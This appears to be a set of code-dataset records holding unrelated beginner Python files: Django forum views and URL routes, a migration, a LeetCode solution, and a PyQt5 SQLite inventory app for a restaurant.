forum = models.Forum.objects.filter(pk=id).first()
form_input = forms.PostingForm()
form_komen = forms.KomenForm()
form_balas = forms.BalasForm()
if req.POST:
form_input = forms.PostingForm(req.POST, req.FILES)
if form_input.is_valid():
form_input.instance.owner = req.user
form_input.instance.forum = forum
form_input.save()
return redirect(f'/forums/{id}')
return render(req, 'forums/detail.html', {
'form': form_input,
'form_komen': form_komen,
'form_balas': form_balas,
'data': forum,
})
def detail_forum_d(req, id):
forum = models.Forum.objects.filter(pk=id).first()
form_input = forms.PostingForm()
form_komen = forms.KomenForm()
form_balas = forms.BalasForm()
if req.POST:
form_input = forms.PostingForm(req.POST, req.FILES)
if form_input.is_valid():
form_input.instance.owner = req.user
form_input.instance.forum = forum
form_input.save()
return redirect(f'/forumd/{id}')
return render(req, 'forumd/detail.html', {
'form': form_input,
'form_komen': form_komen,
'form_balas': form_balas,
'data': forum,
})
def detail_forum_mhs(req, id):
forum = models.Forum.objects.filter(pk=id).first()
komen = models.Komen.objects.filter(pk=id).first()
form_input = forms.PostingForm()
form_komen = forms.KomenForm()
form_balas = forms.BalasForm()
if req.POST:
form_input = forms.PostingForm(req.POST, req.FILES)
if form_input.is_valid():
form_input.instance.owner = req.user
form_input.instance.forum = forum
form_input.save()
return redirect(f'/forum/{id}')
return render(req, 'forum/detail.html', {
'form': form_input,
'form_komen': form_komen,
'form_balas': form_balas,
'data': forum,
})
def delete_posting(req, id, id_posting):
models.Posting.objects.filter(pk=id_posting).delete()
messages.success(req, 'data telah di hapus.')
return redirect(f'/forums/{id}')
def delete_posting_d(req, id, id_posting):
models.Posting.objects.filter(pk=id_posting).delete()
messages.success(req, 'data telah di hapus.')
return redirect(f'/forumd/{id}')
def delete_posting_mhs(req, id, id_posting):
models.Posting.objects.filter(pk=id_posting).delete()
messages.success(req, 'data telah di hapus.')
return redirect(f'/forum/{id}')
def delete_komen(req, id, id_komen):
models.Komen.objects.filter(pk=id_komen).delete()
messages.success(req, 'data telah di hapus.')
return redirect(f'/forums/{id}/komen')
def delete_komen_d(req, id, id_komen):
models.Komen.objects.filter(pk=id_komen).delete()
messages.success(req, 'data telah di hapus.')
return redirect(f'/forumd/{id}/komen')
def delete_komen_mhs(req, id, id_komen):
models.Komen.objects.filter(pk=id_komen).delete()
messages.success(req, 'data telah di hapus.')
return redirect(f'/forum/{id}/komen')
def staf_komen(req, id, id_posting):
posting = models.Posting.objects.filter(pk=id_posting).first()
if req.POST:
form_komen = forms.KomenForm(req.POST, req.FILES)
if form_komen.is_valid():
form_komen.instance.pengguna = req.user
form_komen.instance.posting = posting
form_komen.save()
return redirect(f'/forums/{id}')
def dosen_komen(req, id, id_posting):
posting = models.Posting.objects.filter(pk=id_posting).first()
if req.POST:
form_komen = forms.KomenForm(req.POST, req.FILES)
if form_komen.is_valid():
form_komen.instance.pengguna = req.user
form_komen.instance.posting = posting
form_komen.save()
return redirect(f'/forumd/{id}')
def mhs_komen(req, id, id_posting):
posting = models.Posting.objects.filter(pk=id_posting).first()
if req.POST:
form_komen = forms.KomenForm(req.POST, req.FILES)
if form_komen.is_valid():
form_komen.instance.pengguna = req.user
form_komen.instance.posting = posting
form_komen.save()
return redirect(f'/forum/{id}') | [
"[email protected]"
] | |
cac71e3ed2732220d743d9ceb68cf58d88e39b17 | dea22cf0de22eb7a5574c3ebe9cc239026fcd479 | /core/admin.py | 626df3be91a31a7eb1d1557b4d2c7a0c79bcdc38 | [] | no_license | Vadim4ik1/iswork | b816125978c8029a80b76b07ce5a60c07ebcdb6c | 9dbf8bd0dadb8de607f89438dc997797f03faf5e | refs/heads/master | 2022-06-09T05:22:25.741647 | 2020-05-08T20:18:04 | 2020-05-08T20:18:04 | 262,420,489 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 124 | py | from django.contrib import admin
from core.models import Articles
# Register your models here.
admin.site.register(Articles) | [
"[email protected]"
] | |
a496431f62a75c583cfcf11cd8f506b10c9e08f1 | cebc274c288b463a864fa000ab48d444cd48c12b | /assign4/sensor/migrations/0001_initial.py | 19c25a41ccb7bb15e7b17ca2f8e09c192475d50c | [] | no_license | sejin-k/np_TeamProject7 | f1e6ca0249a0e0d436305b1309ef803ecd2f92d8 | 5941e279f7c59176cc03ef97b799eca34a0291b8 | refs/heads/master | 2020-05-30T22:55:33.933508 | 2019-06-03T13:48:44 | 2019-06-03T13:48:44 | 190,004,581 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 662 | py | # Generated by Django 2.0.13 on 2019-06-03 08:40
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Distance',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('distance', models.CharField(max_length=255)),
('pub_date', models.DateTimeField(verbose_name='date published')),
],
options={
'verbose_name_plural': 'sensor',
},
),
]
| [
"[email protected]"
] | |
2a1914cd41a70291178f9256cf0eac382fbb518c | 388043c361e9eb791eda2d647d9b1ea90666f66e | /loopneverend.py | 3edb5f238e6dff6f5aa5a3dbf0787130403fddbf | [] | no_license | tmuhimbisemoses/doingmathwithpython | ace1c6a1aeea7fa6f723d23c41ac57fe93594faf | 1b09586e9ea4309f0f180262ed53fa5fb5232398 | refs/heads/master | 2021-01-22T09:32:23.581631 | 2017-02-14T22:32:18 | 2017-02-14T22:32:18 | 81,964,961 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 198 | py | def fun():
print('Endless loop')
if __name__ == '__main__':
while True:
fun()
answer=input('Do you want to exit (y)')
if answer == 'y':
break | [
"[email protected]"
] | |
a746d64fc4c527f821d092db87462b4d23a89402 | 70df66a1951ee04cd2f601e5ba006c39f25afdf3 | /unique_path2.py | 6ace1a03ffa07bf67082adf1f4f032b79d91c2aa | [] | no_license | ddyuewang/LeetCode_PYTHON | 7293e5401a57987c8b837d04845a4317e392ce7b | 991532d7707abd8ea65314078494f1afb023a55c | refs/heads/master | 2021-06-12T19:44:15.306947 | 2017-01-12T17:56:18 | 2017-01-12T17:56:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,287 | py | class Solution(object):
def uniquePathsWithObstacles(self, obstacleGrid):
"""
:type obstacleGrid: List[List[int]]
:rtype: int
"""
##### v1. solution that save the results
# # get the dimension
# m = len(obstacleGrid)
# n = len(obstacleGrid[0])
# Solution.res = {}
# ### initialization phase - not necessary all 1
# for i in range(n):
# if obstacleGrid[0][i] == 1:
# break;
# Solution.res[(0,i)] = 1
# for i in range(m):
# if obstacleGrid[i][0] == 1:
# break;
# Solution.res[(i,0)] = 1
# return self.dfs(obstacleGrid, m-1, n-1)
# def dfs(self, obstacleGrid, x, y):
# if obstacleGrid[0][0] == 1 or obstacleGrid[x][y] == 1:
# return 0
# if x<0 or y<0:
# return 0
# if x==0 and y==0:
# return 1
# if (x,y) in Solution.res.keys():
# return Solution.res[(x,y)]
# else:
# Solution.res[(x,y)] = self.dfs(obstacleGrid,x-1,y) + self.dfs(obstacleGrid,x,y-1)
# return Solution.res[(x,y)]
######----------------------------------------
# v2. using single list - DP
m = len(obstacleGrid)
n = len(obstacleGrid[0])
#### deal with boundary case
if m == 1 or n == 1:
if 1 not in obstacleGrid[0] and [1] not in obstacleGrid:
return 1
else:
return 0
#### boundary condition
if obstacleGrid[0][0] == 1 or obstacleGrid[m-1][n-1] == 1:
return 0
Solution.res = [0] * n # just use one single list - in n direction
if obstacleGrid[0][0] == 0:
Solution.res[0] = 1
else:
Solution.res[0] = 0
for i in range(m):
if Solution.res[0] != 0 and obstacleGrid[i][0] ==0:
Solution.res[0] = 1
else:
Solution.res[0] = 0
for j in range(1,n):
if (obstacleGrid[i][j] == 0):
Solution.res[j] = Solution.res[j] + Solution.res[j-1]
else:
Solution.res[j] = 0
return Solution.res[n-1] | [
"[email protected]"
] | |
76ddb0b846e4b5fe0b12d67b9a390c063bd234f4 | 28e65c98809fddd70ade446c4291961369be9253 | /emrnew/doctor/urls.py | 00dbfc35a4e5bc7c349334177a0068639a4027b8 | [] | no_license | RohiniVasudev/emrnew--2- | d42213f08cc33e40d0f848e4a8d1243e508e6a4d | c2200e9a8cede3939e7b04b767ca97cdd5536cd2 | refs/heads/master | 2023-01-31T21:10:28.288420 | 2020-12-14T22:14:06 | 2020-12-14T22:14:06 | 321,486,037 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 988 | py | from django.urls import path
from . import views
urlpatterns = [
path('',views.home,name='home'),
path('login',views.login,name="login"),
path('register',views.register,name="register"),
path('login2',views.login2,name="login2"),
path('rcomplete',views.rcomplete,name="rcomplete"),
path('copd',views.copd,name="copd"),
path('lungcancer',views.lungcancer,name='lungcancer'),
path('diabetes',views.diabetes,name='diabetes'),
path('heart',views.heart,name="heart"),
path('predCopd',views.predCopd,name="predCopd"),
path('predict',views.predict,name='predict'),
path('predicDiabetes',views.predicDiabetes,name='predicDiabetes'),
path('predHeart',views.predHeart,name='predHeart'),
path('datafetch',views.datafetch,name="datafetch"),
path('copdesv',views.copdesv,name="copdesv"),
path('lungesv',views.lungesv,name='lungesv'),
path('heartesv',views.heartesv,name='heartesv'),
path('diaesv',views.diaesv,name="diaesv")
] | [
"[email protected]"
] | |
b4f552e81b2541b391b1576e28ec3cc293d2726a | 81add62c05ebf1970babc14856d2284b60b95d24 | /artikli.py | 52ef1d50faa3753373dfb00312b7f4227d0b13e4 | [] | no_license | B4ch0/BP2 | 3c8b7bb0a4d82b35b6884447a78c77041a353a5a | 8a9725b6bd2bcc92452c6a6bcdeccdd600a8ae96 | refs/heads/master | 2022-04-02T03:19:08.226806 | 2020-01-07T19:11:34 | 2020-01-07T19:11:34 | 232,393,343 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 49,727 | py |
from artui import *
import os
import datetime
import artiklidb as ad
import init_db
from PyQt5.QtWidgets import QTabWidget
from PyQt5.QtWidgets import QTableWidget
from PyQt5.QtWidgets import QTableWidgetItem
from PyQt5.QtWidgets import QVBoxLayout
from PyQt5.QtGui import QIcon
from PyQt5.QtWidgets import QFormLayout
from PyQt5.QtWidgets import QLabel
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtWidgets import QLineEdit
from PyQt5.QtWidgets import QListWidget
from PyQt5.QtWidgets import QStackedWidget
from PyQt5.QtWidgets import (QWidget, QPushButton,QMainWindow,
QHBoxLayout, QApplication,QAction,QFileDialog)
import sqlite3
try:
conn = sqlite3.connect('vanreda.db')
c = conn.cursor()
c.execute("""CREATE TABLE artikli (
artikal text NOT NULL,
kolicina integer,
cijena integer,
sifra integer unique,
kategorija integer,
artikal_id integer primary key autoincrement,
kategorija integer
) """)
conn.commit()
except Exception:
print('DB postoji')
class Login(QtWidgets.QDialog):
def __init__(self, parent=None):
super(Login, self).__init__(parent)
self.textName = QtWidgets.QLineEdit(self)
self.textName.setPlaceholderText("Radnik...")
self.textName.setStyleSheet("background-color: rgb(255, 255, 255);")
self.textPass = QtWidgets.QLineEdit(self)
self.textPass.setEchoMode(QtWidgets.QLineEdit.Password)
self.textPass.setPlaceholderText("ล ifra...")
self.textPass.setStyleSheet("background-color: rgb(255, 255, 255);")
self.buttonLogin = QtWidgets.QPushButton('Prijava', self)
self.buttonLogin.setStyleSheet("QPushButton {\n"
" font: 14pt \"Franklin Gothic Medium\";\n"
" color: #333;\n"
" border: 2px solid #555;\n"
" border-radius: 20px;\n"
" border-style: outset;\n"
" background: qradialgradient(\n"
" cx: 0.3, cy: -0.4, fx: 0.3, fy: -0.4,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #888\n"
" );\n"
" padding: 5px;\n"
" }\n"
"\n"
"QPushButton:hover {\n"
" background: qradialgradient(\n"
" cx: 0.3, cy: -0.4, fx: 0.3, fy: -0.4,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #bbb\n"
" );\n"
" }\n"
"\n"
"QPushButton:pressed {\n"
" border-style: inset;\n"
" background: qradialgradient(\n"
" cx: 0.4, cy: -0.1, fx: 0.4, fy: -0.1,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #ddd\n"
" );\n"
" }")
self.buttonLogin.clicked.connect(self.artLogin)
layout = QtWidgets.QVBoxLayout(self)
self.setStyleSheet("background-color: rgb(255, 255, 199);")
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap("../log/ikonaframe.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
icon.addPixmap(QtGui.QPixmap("../log/ikonaframe.png"), QtGui.QIcon.Normal, QtGui.QIcon.On)
icon.addPixmap(QtGui.QPixmap("../log/ikonaframe.png"), QtGui.QIcon.Disabled, QtGui.QIcon.Off)
icon.addPixmap(QtGui.QPixmap("../log/ikonaframe.png"), QtGui.QIcon.Disabled, QtGui.QIcon.On)
icon.addPixmap(QtGui.QPixmap("../log/ikonaframe.png"), QtGui.QIcon.Active, QtGui.QIcon.Off)
icon.addPixmap(QtGui.QPixmap("../log/ikonaframe.png"), QtGui.QIcon.Active, QtGui.QIcon.On)
icon.addPixmap(QtGui.QPixmap("../log/ikonaframe.png"), QtGui.QIcon.Selected, QtGui.QIcon.Off)
icon.addPixmap(QtGui.QPixmap("../log/ikonaframe.png"), QtGui.QIcon.Selected, QtGui.QIcon.On)
self.setWindowIcon(icon)
layout.addWidget(self.textName)
layout.addWidget(self.textPass)
layout.addWidget(self.buttonLogin)
self.setWindowTitle('"Van Reda"')
def artLogin(self):
username = self.textName.text()
password = self.textPass.text()
connection = sqlite3.connect("vanreda.db")
result = connection.execute("SELECT * FROM radnici WHERE Radnik_ID = ? AND Sifra = ? AND Pozicija =1", (username, password))
if (len(result.fetchall()) > 0):
self.accept()
else: QtWidgets.QMessageBox.warning(
self, 'Greลกka', 'Neispravni podaci')
class Glavni(QMainWindow):
def __init__(self):
super().__init__()
self.artui = Ui_MainWindow()
self.artui.setupUi(self)
self.setWindowTitle('Artikli "Van Reda"')
self.initUI()
def initUI(self):
self.st = stackedGlavni()
exitAct = QAction(QIcon('slOdustani.png'), 'IZLAZ', self)
exitAct.setStatusTip('IZLAZ')
exitAct.triggered.connect(self.close)
self.statusBar()
toolbar = self.addToolBar('Izlaz')
toolbar.addAction(exitAct)
self.setCentralWidget(self.st)
self.show()
class stackedGlavni(QWidget):
def __init__(self):
super(stackedGlavni, self).__init__()
self.leftlist = QListWidget()
self.leftlist.setStyleSheet("background-color: rgb(255, 255, 255); border: 2px solid #555; border-radius: 2px;")
self.leftlist.setFixedWidth(200)
self.leftlist.setFixedHeight(300)
self.leftlist.insertItem(0, 'DODAJ ARTIKAL')
self.leftlist.insertItem(1, 'IZMJENA ARTIKLA')
self.leftlist.insertItem(2, 'PREGLED ARTIKLA')
self.leftlist.insertItem(3, 'EVIDENCIJA UPISA U BAZU')
self.stack1 = QWidget()
self.stack2 = QWidget()
self.stack3 = QWidget()
self.stack4 = QWidget()
self.dodajUI()
self.stack2UI()
self.stack3UI()
self.stack4UI()
self.Stack = QStackedWidget(self)
self.Stack.addWidget(self.stack1)
self.Stack.addWidget(self.stack2)
self.Stack.addWidget(self.stack3)
self.Stack.addWidget(self.stack4)
hbox = QHBoxLayout(self)
hbox.addWidget(self.leftlist)
hbox.addWidget(self.Stack)
self.setLayout(hbox)
self.leftlist.currentRowChanged.connect(self.display)
self.setGeometry(300,350, 200, 200)
self.show()
def dodajUI(self):
layout = QFormLayout()
self.ok = QPushButton('DODAJ', self)
cancel = QPushButton('PONIล TI', self)
self.art_name = QLineEdit()
layout.addRow("NAZIV ARTIKLA", self.art_name)
self.art_count = QLineEdit()
layout.addRow("KOLIฤINA", self.art_count)
self.art_cost = QLineEdit()
layout.addRow("CIJENA", self.art_cost)
self.art_code =QLineEdit()
layout.addRow("ล IFRA", self.art_code)
self.artKat = QLineEdit()
layout.addRow("KATEGORIJA", self.artKat)
#self.artInfo.setText("Proba")
#self.artInfo.setGeometry(420,420,47,13)
layout.addWidget(self.ok)
layout.addWidget(cancel)
# self.artInfo.setGeometry(420,420,47,13)
self.art_name.setStyleSheet("background-color: rgb(255, 255, 255);")
self.art_name.setFixedWidth(300)
self.art_count.setFixedWidth(200)
self.art_cost.setFixedWidth(200)
self.art_code.setFixedWidth(200)
self.artKat.setFixedWidth(50)
self.art_cost.setStyleSheet("background-color: rgb(255, 255, 255);")
self.art_name.setContentsMargins(0,0,0,10)
self.art_count.setContentsMargins(0, 0, 0, 10)
self.art_cost.setContentsMargins(0, 0, 0, 10)
self.art_code.setContentsMargins(0, 0, 0, 10)
self.artKat.setStyleSheet("background-color: rgb(255, 255, 255);")
self.art_count.setStyleSheet("background-color: rgb(255, 255, 255);")
self.art_code.setStyleSheet("background-color: rgb(255, 255, 255);")
self.ok.setFixedWidth(200)
self.ok.setStyleSheet("QPushButton {\n"
" font: 14pt \"Franklin Gothic Medium\";\n"
" color: #333;\n"
" border: 2px solid #555;\n"
" border-radius: 20px;\n"
" border-style: outset;\n"
" background: qradialgradient(\n"
" cx: 0.3, cy: -0.4, fx: 0.3, fy: -0.4,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #888\n"
" );\n"
" padding: 5px;\n"
" }\n"
"\n"
"QPushButton:hover {\n"
" background: qradialgradient(\n"
" cx: 0.3, cy: -0.4, fx: 0.3, fy: -0.4,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #bbb\n"
" );\n"
" }\n"
"\n"
"QPushButton:pressed {\n"
" border-style: inset;\n"
" background: qradialgradient(\n"
" cx: 0.4, cy: -0.1, fx: 0.4, fy: -0.1,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #ddd\n"
" );\n"
" }; "
"")
self.ok.setIcon(QtGui.QIcon('slPrijava.png'))
cancel.setStyleSheet("QPushButton {\n"
" font: 14pt \"Franklin Gothic Medium\";\n"
" color: #333;\n"
" border: 2px solid #555;\n"
" border-radius: 20px;\n"
" border-style: outset;\n"
" background: qradialgradient(\n"
" cx: 0.3, cy: -0.4, fx: 0.3, fy: -0.4,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #888\n"
" );\n"
" padding: 5px;\n"
" }\n"
"\n"
"QPushButton:hover {\n"
" background: qradialgradient(\n"
" cx: 0.3, cy: -0.4, fx: 0.3, fy: -0.4,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #bbb\n"
" );\n"
" }\n"
"\n"
"QPushButton:pressed {\n"
" border-style: inset;\n"
" background: qradialgradient(\n"
" cx: 0.4, cy: -0.1, fx: 0.4, fy: -0.1,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #ddd\n"
" );\n"
" }")
cancel.setFixedWidth(200)
cancel.setIcon(QtGui.QIcon('slOdustani.png'))
self.ok.clicked.connect(self.on_click)
cancel.clicked.connect(self.art_name.clear)
cancel.clicked.connect(self.art_cost.clear)
cancel.clicked.connect(self.art_count.clear)
cancel.clicked.connect(self.art_code.clear)
cancel.clicked.connect(self.artKat.clear)
self.stack1.setLayout(layout)
self.artInfo = QLabel()
layout.addRow("KATEGORIJA: 1- Piฤe 2- Meso 3- Pizza",self.artInfo)
self.artSifra = QLabel()
layout.addRow("ล IFRE: 1-16= Piฤe 17-32=Meso 33-48=Pizza",self.artSifra)
#dodaj
def on_click(self):
now = datetime.datetime.now()
art_name_inp = self.art_name.text().replace(' ','_').lower()
art_count_inp = int(self.art_count.text())
art_cost_inp = int(self.art_cost.text())
art_code_inp = int(self.art_code.text())
art_kat_inp = int(self.artKat.text())
art_add_date_time = now.strftime("%Y-%m-%d %H:%M")
d = ad.insert_prod(art_name_inp,art_count_inp,art_cost_inp,art_code_inp,art_kat_inp,art_add_date_time)
print(d)
def stack2UI(self):
layout = QHBoxLayout()
tabs = QTabWidget()
self.tab1 = QWidget()
self.tab2 = QWidget()
self.tab3 = QWidget()
self.tab4 = QWidget()
self.tab5 = QWidget()
tabs.addTab(self.tab1, 'DODAJ KOLIฤINU')
tabs.addTab(self.tab2, 'SMANJI KOLIฤINU')
tabs.addTab(self.tab4, 'IZMIJENI CIJENU')
tabs.addTab(self.tab5, 'IZMIJENI ล IFRU')
tabs.addTab(self.tab3, 'IZBRIล I ARTIKAL')
self.tab1UI()
self.tab2UI()
self.tab3UI()
self.tab4UI()
self.tab5UI()
layout.addWidget(tabs)
self.stack2.setLayout(layout)
def tab1UI(self):
layout = QFormLayout()
self.ok_add = QPushButton('DODAJ', self)
cancel = QPushButton('PONIล TI', self)
self.art_name_add = QLineEdit()
layout.addRow("ARTIKAL", self.art_name_add)
self.art_count_add = QLineEdit()
layout.addRow("KOLIฤINA ZA DODAT", self.art_count_add)
layout.addWidget(self.ok_add)
layout.addWidget(cancel)
self.tab1.setLayout(layout)
self.art_name_add.setStyleSheet("background-color: rgb(255, 255, 255);")
self.art_count_add.setStyleSheet("background-color: rgb(255, 255, 255);")
self.art_name_add.setFixedWidth(350)
self.art_count_add.setFixedWidth(200)
self.ok_add.clicked.connect(self.call_add)
cancel.clicked.connect(self.art_name_add.clear)
cancel.clicked.connect(self.art_count_add.clear)
self.ok_add.setStyleSheet("QPushButton {\n"
" font: 14pt \"Franklin Gothic Medium\";\n"
" color: #333;\n"
" border: 2px solid #555;\n"
" border-radius: 20px;\n"
" border-style: outset;\n"
" background: qradialgradient(\n"
" cx: 0.3, cy: -0.4, fx: 0.3, fy: -0.4,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #888\n"
" );\n"
" padding: 5px;\n"
" }\n"
"\n"
"QPushButton:hover {\n"
" background: qradialgradient(\n"
" cx: 0.3, cy: -0.4, fx: 0.3, fy: -0.4,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #bbb\n"
" );\n"
" }\n"
"\n"
"QPushButton:pressed {\n"
" border-style: inset;\n"
" background: qradialgradient(\n"
" cx: 0.4, cy: -0.1, fx: 0.4, fy: -0.1,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #ddd\n"
" );\n"
" }; "
"")
self.ok_add.setFixedWidth(230)
self.ok_add.setIcon(QtGui.QIcon('noviunos.png'))
cancel.setFixedWidth(230)
cancel.setIcon(QtGui.QIcon('slOdustani.png'))
cancel.setStyleSheet("QPushButton {\n"
" font: 14pt \"Franklin Gothic Medium\";\n"
" color: #333;\n"
" border: 2px solid #555;\n"
" border-radius: 20px;\n"
" border-style: outset;\n"
" background: qradialgradient(\n"
" cx: 0.3, cy: -0.4, fx: 0.3, fy: -0.4,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #888\n"
" );\n"
" padding: 5px;\n"
" }\n"
"\n"
"QPushButton:hover {\n"
" background: qradialgradient(\n"
" cx: 0.3, cy: -0.4, fx: 0.3, fy: -0.4,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #bbb\n"
" );\n"
" }\n"
"\n"
"QPushButton:pressed {\n"
" border-style: inset;\n"
" background: qradialgradient(\n"
" cx: 0.4, cy: -0.1, fx: 0.4, fy: -0.1,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #ddd\n"
" );\n"
" }")
def tab2UI(self):
layout = QFormLayout()
self.ok_red = QPushButton('ODUZMI', self)
cancel = QPushButton('PONIล TI', self)
self.art_name_red = QLineEdit()
layout.addRow("ARTIKAL", self.art_name_red)
self.art_count_red = QLineEdit()
layout.addRow("KOLIฤINA ZA SMANJIT", self.art_count_red)
layout.addWidget(self.ok_red)
layout.addWidget(cancel)
self.tab2.setLayout(layout)
self.art_name_red.setStyleSheet("background-color: rgb(255, 255, 255);")
self.art_count_red.setStyleSheet("background-color: rgb(255, 255, 255);")
self.art_name_red.setFixedWidth(350)
self.art_count_red.setFixedWidth(200)
self.ok_red.clicked.connect(self.call_red)
cancel.clicked.connect(self.art_name_red.clear)
cancel.clicked.connect(self.art_count_red.clear)
self.ok_red.setStyleSheet("QPushButton {\n"
" font: 14pt \"Franklin Gothic Medium\";\n"
" color: #333;\n"
" border: 2px solid #555;\n"
" border-radius: 20px;\n"
" border-style: outset;\n"
" background: qradialgradient(\n"
" cx: 0.3, cy: -0.4, fx: 0.3, fy: -0.4,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #888\n"
" );\n"
" padding: 5px;\n"
" }\n"
"\n"
"QPushButton:hover {\n"
" background: qradialgradient(\n"
" cx: 0.3, cy: -0.4, fx: 0.3, fy: -0.4,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #bbb\n"
" );\n"
" }\n"
"\n"
"QPushButton:pressed {\n"
" border-style: inset;\n"
" background: qradialgradient(\n"
" cx: 0.4, cy: -0.1, fx: 0.4, fy: -0.1,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #ddd\n"
" );\n"
" }; "
"")
self.ok_red.setFixedWidth(230)
self.ok_red.setIcon(QtGui.QIcon('minus.png'))
cancel.setFixedWidth(230)
cancel.setIcon(QtGui.QIcon('slOdustani.png'))
cancel.setStyleSheet("QPushButton {\n"
" font: 14pt \"Franklin Gothic Medium\";\n"
" color: #333;\n"
" border: 2px solid #555;\n"
" border-radius: 20px;\n"
" border-style: outset;\n"
" background: qradialgradient(\n"
" cx: 0.3, cy: -0.4, fx: 0.3, fy: -0.4,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #888\n"
" );\n"
" padding: 5px;\n"
" }\n"
"\n"
"QPushButton:hover {\n"
" background: qradialgradient(\n"
" cx: 0.3, cy: -0.4, fx: 0.3, fy: -0.4,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #bbb\n"
" );\n"
" }\n"
"\n"
"QPushButton:pressed {\n"
" border-style: inset;\n"
" background: qradialgradient(\n"
" cx: 0.4, cy: -0.1, fx: 0.4, fy: -0.1,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #ddd\n"
" );\n"
" }")
def tab3UI(self):
layout = QFormLayout()
self.ok_del = QPushButton('IZBRIล I', self)
cancel = QPushButton('PONIล TI', self)
self.art_name_del = QLineEdit()
layout.addRow("ARTIKAL", self.art_name_del)
self.art_code_del = QLineEdit()
layout.addRow("ili ล IFRA", self.art_code_del)
layout.addWidget(self.ok_del)
layout.addWidget(cancel)
self.tab3.setLayout(layout)
self.art_name_del.setStyleSheet("background-color: rgb(255, 255, 255);")
self.art_code_del.setStyleSheet("background-color: rgb(255, 255, 255);")
self.art_name_del.setFixedWidth(350)
self.art_code_del.setFixedWidth(200)
self.ok_del.clicked.connect(self.call_del)
cancel.clicked.connect(self.art_name_del.clear)
cancel.clicked.connect(self.art_code_del.clear)
self.ok_del.setStyleSheet("QPushButton {\n"
" font: 14pt \"Franklin Gothic Medium\";\n"
" color: #333;\n"
" border: 2px solid #555;\n"
" border-radius: 20px;\n"
" border-style: outset;\n"
" background: qradialgradient(\n"
" cx: 0.3, cy: -0.4, fx: 0.3, fy: -0.4,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #888\n"
" );\n"
" padding: 5px;\n"
" }\n"
"\n"
"QPushButton:hover {\n"
" background: qradialgradient(\n"
" cx: 0.3, cy: -0.4, fx: 0.3, fy: -0.4,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #bbb\n"
" );\n"
" }\n"
"\n"
"QPushButton:pressed {\n"
" border-style: inset;\n"
" background: qradialgradient(\n"
" cx: 0.4, cy: -0.1, fx: 0.4, fy: -0.1,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #ddd\n"
" );\n"
" }; "
"")
self.ok_del.setFixedWidth(230)
self.ok_del.setIcon(QtGui.QIcon('brisanje.png'))
cancel.setFixedWidth(230)
cancel.setIcon(QtGui.QIcon('slOdustani.png'))
cancel.setStyleSheet("QPushButton {\n"
" font: 14pt \"Franklin Gothic Medium\";\n"
" color: #333;\n"
" border: 2px solid #555;\n"
" border-radius: 20px;\n"
" border-style: outset;\n"
" background: qradialgradient(\n"
" cx: 0.3, cy: -0.4, fx: 0.3, fy: -0.4,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #888\n"
" );\n"
" padding: 5px;\n"
" }\n"
"\n"
"QPushButton:hover {\n"
" background: qradialgradient(\n"
" cx: 0.3, cy: -0.4, fx: 0.3, fy: -0.4,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #bbb\n"
" );\n"
" }\n"
"\n"
"QPushButton:pressed {\n"
" border-style: inset;\n"
" background: qradialgradient(\n"
" cx: 0.4, cy: -0.1, fx: 0.4, fy: -0.1,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #ddd\n"
" );\n"
" }")
def tab4UI(self):
layout = QFormLayout()
self.btn_izmj = QPushButton('IZMJENI', self)
cancel = QPushButton('PONIล TI', self)
self.art_name_izmj = QLineEdit()
layout.addRow("ARTIKAL", self.art_name_izmj)
self.art_count_izmj = QLineEdit()
layout.addRow("NOVA CIJENA", self.art_count_izmj)
layout.addWidget(self.btn_izmj)
layout.addWidget(cancel)
self.tab4.setLayout(layout)
self.art_name_izmj.setStyleSheet("background-color: rgb(255, 255, 255);")
self.art_count_izmj.setStyleSheet("background-color: rgb(255, 255, 255);")
self.art_name_izmj.setFixedWidth(350)
self.art_count_izmj.setFixedWidth(200)
self.btn_izmj.clicked.connect(self.call_izmj)
cancel.clicked.connect(self.art_name_izmj.clear)
cancel.clicked.connect(self.art_count_izmj.clear)
self.btn_izmj.setStyleSheet("QPushButton {\n"
" font: 14pt \"Franklin Gothic Medium\";\n"
" color: #333;\n"
" border: 2px solid #555;\n"
" border-radius: 20px;\n"
" border-style: outset;\n"
" background: qradialgradient(\n"
" cx: 0.3, cy: -0.4, fx: 0.3, fy: -0.4,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #888\n"
" );\n"
" padding: 5px;\n"
" }\n"
"\n"
"QPushButton:hover {\n"
" background: qradialgradient(\n"
" cx: 0.3, cy: -0.4, fx: 0.3, fy: -0.4,\n"
